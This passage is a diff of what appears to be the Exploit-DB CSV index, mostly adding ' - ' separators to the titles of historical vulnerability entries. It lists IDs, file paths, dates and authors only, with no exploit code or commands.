Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 -19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 +19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 -19509,platforms/solaris/local/19509.sh,"Solaris 2.6 Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 +19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 -19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 +19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 -19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 +19793,platforms/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0 -19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 +19520,platforms/bsd/remote/19520.txt,"BSD telnetd - Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,linux,local,0 @@ -16897,10 +16893,10 @@ id,file,description,date,author,platform,type,port 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m - Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 - Download Behavior",1999-09-27,"Georgi Guninski",windows,remote,0 19531,platforms/hardware/remote/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 -19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 +19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0 19534,platforms/solaris/local/19534.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0 -19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp",1996-12-01,SOD,hp-ux,local,0 +19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 @@ -16908,7 +16904,7 @@ id,file,description,date,author,platform,type,port 19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0 -19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 +19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 - suidperl Overflow (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 @@ -16931,17 +16927,17 @@ id,file,description,date,author,platform,type,port 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools",1999-10-22,"Brock Tellier",linux,local,0 -19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 +19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (1)",1999-10-28,"Alberto Soli",windows,dos,0 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)",1999-11-04,"Alberto Solino",windows,remote,0 -19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS",1999-10-28,"Nobuo Miwa",multiple,dos,0 +19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - RCPT TO DoS",1999-10-28,"Nobuo Miwa",multiple,dos,0 19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 Plugin - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 -19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,Metasploit,windows,remote,0 +19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle - Remote Code Execution",2012-07-05,Metasploit,windows,remote,0 19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0 19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0 @@ -16949,8 +16945,8 @@ id,file,description,date,author,platform,type,port 19675,platforms/linux/dos/19675.c,"Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options",1999-12-08,"Andrea Arcangeli",linux,dos,0 19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (1)",2000-05-17,"Brock Tellier",freebsd,local,0 19677,platforms/linux/local/19677.c,"FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 -19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 -19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 +19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 +19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 19582,platforms/unix/local/19582.c,"IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19583,platforms/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Buffer Overflow",1999-11-02,UNYUN,unix,local,0 19584,platforms/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server MAIL FROM Buffer Overflow",1999-10-30,UNYUN,windows,remote,0 @@ -16974,23 +16970,23 @@ id,file,description,date,author,platform,type,port 30094,platforms/php/webapps/30094.txt,"DGNews 2.1 - Footer.php Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",php,webapps,0 20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 -19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 +19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 19607,platforms/windows/remote/19607.c,"Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 -19608,platforms/windows/remote/19608.c,"Windows 95/98 U- NC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 -19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14 b Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 +19608,platforms/windows/remote/19608.c,"Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 +19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14 b - Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 -19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 +19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 -19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 +19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos,0 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 -19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS",1999-11-10,"Ussr Labs",windows,dos,0 +19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server - DoS",1999-11-10,"Ussr Labs",windows,dos,0 19620,platforms/unix/remote/19620.txt,"Matt Wright - FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 +19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow DoS",1999-11-17,"Ussr Labs",windows,dos,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 @@ -17014,21 +17010,21 @@ id,file,description,date,author,platform,type,port 19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote,0 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote,0 -19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0 +19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc Symlink",1999-12-01,"Brock Tellier",freebsd,local,0 +19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink",1999-12-01,"Brock Tellier",freebsd,local,0 19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0 -19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' permissions",1999-12-03,"Brock Tellier",sco,local,0 19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' commands",1999-12-03,"Brock Tellier",sco,local,0 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local,0 -19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 -19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 +19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 +19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0 19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5 a - Server SITE PASS DoS",1999-12-02,"Ussr Labs",windows,dos,0 @@ -17041,31 +17037,31 @@ id,file,description,date,author,platform,type,port 19671,platforms/windows/webapps/19671.rb,"Umbraco CMS - Remote Command Execution",2012-07-09,Metasploit,windows,webapps,0 19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow",1999-12-13,UNYUN,windows,local,0 -19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0 -19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0 +19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0 +19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0 19681,platforms/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service",1999-12-22,"Brock Tellier",solaris,dos,0 19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server_ Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 -19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 Weak Password Encryption",1999-12-19,"Mike Davis",windows,local,0 +19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",windows,local,0 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows",1999-12-20,"Last Stage of Delirium",multiple,local,0 -19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2",1999-12-22,"Steve Reid",freebsd,local,0 +19685,platforms/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Exploit",1999-12-22,"Steve Reid",freebsd,local,0 19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0 -19687,platforms/freebsd/dos/19687.c,"Real Networks Real Server 5.0 ramgen Denial of Service",1999-12-23,bow,freebsd,dos,0 +19687,platforms/freebsd/dos/19687.c,"Real Networks Real Server 5.0 - ramgen Denial of Service",1999-12-23,bow,freebsd,dos,0 19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0 19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0 -19690,platforms/unix/remote/19690.txt,"GlFtpd 1.17.2",1999-12-23,suid,unix,remote,0 +19690,platforms/unix/remote/19690.txt,"GlFtpd 1.17.2 - Exploit",1999-12-23,suid,unix,remote,0 19691,platforms/multiple/remote/19691.pl,"Tony Greenwood WebWho+ 1.1 - Remote Command Execution",1999-12-26,loophole,multiple,remote,0 -19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",multiple,local,0 +19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",multiple,local,0 19693,platforms/linux/local/19693.txt,"Python Untrusted Search Path/Code Execution",2012-07-09,rogueclown,linux,local,0 19694,platforms/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal",1999-12-29,"Rudi Carell",unix,remote,0 19695,platforms/windows/dos/19695.txt,"Michael Lamont Savant WebServer 2.0 - NULL Character DoS",1999-12-28,"Ussr Labs",windows,dos,0 19696,platforms/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 - w3-msql Buffer Overflow",1999-10-28,Zhodiac,solaris,remote,0 -19697,platforms/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 Race Condition",1999-12-27,"Brock Tellier",unix,local,0 +19697,platforms/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 - Race Condition",1999-12-27,"Brock Tellier",unix,local,0 19698,platforms/linux/local/19698.txt,"Great Circle Associates Majordomo 1.94.4 - Local resend",1999-12-28,"Brock Tellier",linux,local,0 19699,platforms/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)",1999-12-29,Shevek,linux,local,0 19700,platforms/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)",1999-12-29,morpheus[bd],linux,local,0 19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",linux,dos,0 -19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 -19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos,0 +19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 +19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos,0 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH",1999-12-30,Loneguard,multiple,local,0 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer",1999-12-31,Loneguard,irix,local,0 @@ -17085,7 +17081,7 @@ id,file,description,date,author,platform,type,port 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",multiple,local,0 19722,platforms/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 -19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 +19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 - get_it PATH",2000-01-12,"Cesar Tascon Alvarez",linux,local,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99 b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 19726,platforms/bsd/local/19726.c,"FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 @@ -17106,9 +17102,9 @@ id,file,description,date,author,platform,type,port 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0 19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut",2000-02-04,"Ussr Labs",windows,remote,0 -19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack DoS",2000-02-07,"Adam Gray",novell,dos,0 +19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - DoS",2000-02-07,"Adam Gray",novell,dos,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 -19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy DoS",2000-02-04,"Chicken Man",novell,dos,0 +19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - DoS",2000-02-04,"Chicken Man",novell,dos,0 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0 19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR DoS",2000-02-10,"Nobuo Miwa",windows,dos,0 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,multiple,remote,0 @@ -17118,16 +17114,16 @@ 